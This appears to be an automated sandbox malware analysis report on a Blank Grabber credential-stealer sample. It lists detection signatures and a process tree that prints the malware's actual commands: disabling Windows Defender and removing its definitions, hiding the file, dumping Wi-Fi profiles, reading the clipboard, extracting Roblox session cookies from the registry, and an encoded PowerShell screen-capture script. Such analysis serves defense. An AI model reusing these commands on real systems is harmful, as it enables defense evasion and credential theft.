Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
driver.exe

Overview

General Information

Sample name:driver.exe
Analysis ID:1587410
MD5:d368f3959b9a9ff30d34004d99676729
SHA1:21f07b36197be39f6db1cf8ae7d9cb1afc750b48
SHA256:f86f4f262306edd56ac4e433fd053be687ef96f40c7ad7ddf63aae8ec851c499
Tags:exeuser-zhuzhu0009
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Self deletion via cmd or bat file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • driver.exe (PID: 5708 cmdline: "C:\Users\user\Desktop\driver.exe" MD5: D368F3959B9A9FF30D34004D99676729)
    • driver.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\driver.exe" MD5: D368F3959B9A9FF30D34004D99676729)
      • cmd.exe (PID: 1472 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2128 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5652 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 5588 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 6640 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 5396 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 6412 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\driver.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 6460 cmdline: attrib +h +s "C:\Users\user\Desktop\driver.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 6672 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2132 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7216 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7496 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7236 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7512 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7368 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7504 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7380 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7560 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7608 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7888 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7832 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7868 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7968 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8156 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 8140 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3560 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7476 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7656 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5CD.tmp" "c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7772 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7572 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5232 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 5448 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7452 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7424 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7380 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • SIHClient.exe (PID: 7792 cmdline: C:\Windows\System32\sihclient.exe /cv g+FHZVRhzUydp9rkwD8VSQ.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)
      • cmd.exe (PID: 7764 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7980 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7484 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7688 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7232 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7640 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
